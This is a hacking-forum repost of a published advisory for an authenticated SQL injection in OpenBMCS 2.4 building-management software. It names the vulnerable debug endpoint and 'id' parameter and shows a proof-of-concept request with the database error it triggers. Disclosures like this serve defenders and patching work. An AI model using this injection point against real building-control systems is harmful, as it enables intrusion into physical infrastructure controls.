Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

OpenBMCS 2.4 - SQLi (Authenticated)



Recommended Posts

# Exploit Title: OpenBMCS 2.4 - SQLi (Authenticated)
# Exploit Author: LiquidWorm
# Date: 26/10/2021

OpenBMCS 2.4 Authenticated SQL Injection

Product web page: https://www.openbmcs.com
Affected version: 2.4

Summary: Building Management & Controls System (BMCS). No matter what the
size of your business, the OpenBMCS software has the ability to expand to
hundreds of controllers. Our product can control and monitor anything from
a garage door to a complete campus wide network, with everything you need
on board.

Desc: OpenBMCS suffers from an SQL Injection vulnerability. Input passed via
the 'id' GET parameter is not properly sanitised before being returned to the
user or used in SQL queries. This can be exploited to manipulate SQL queries
by injecting arbitrary SQL code.

Tested on: Linux Ubuntu 5.4.0-65-generic (x86_64)
           Linux Debian 4.9.0-13-686-pae/4.9.228-1 (i686)
           Apache/2.4.41 (Ubuntu)
           Apache/2.4.25 (Debian)

Vulnerability discovered by Semen 'samincube' Rozhkov

Advisory ID: ZSL-2022-5692
Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2022-5692.php



The following PoC request demonstrates the issue (authenticated user session is required):

GET /debug/obix_test.php?id=1%22 HTTP/1.1
Cookie: PHPSESSID=ssid123ssid123ssid1234ssid
Connection: close


HTTP/1.1 200 OK
Date: Sat, 1 Jan 2022 15:09:54 GMT
Server: Apache/2.4.10 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 629
Connection: close
Content-Type: text/html; charset=UTF-8

<br />
<b>Fatal error</b>:  Uncaught exception 'PDOException' with message 'SQLSTATE[HY000]: General error: 1 unrecognized token: """' in /var/www/openBMCS/classes/dbconnection.php:146
Stack trace:
#0 /var/www/openBMCS/classes/dbconnection.php(146): PDO->query('SELECT ip_addre...')
#1 /var/www/openBMCS/php/obix/obix.functions.php(289): controllerDB->querySingle('SELECT ip_addre...', true)
#2 /var/www/openBMCS/debug/obix_test.php(16): sendObixGetTocontroller(Object(controllerDB), '1"', '/obix/config')
#3 {main}
  thrown in <b>/var/www/openBMCS/classes/dbconnection.php</b> on line <b>146</b><br />
Link to post
Link to comment
Share on other sites


discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    • Create New...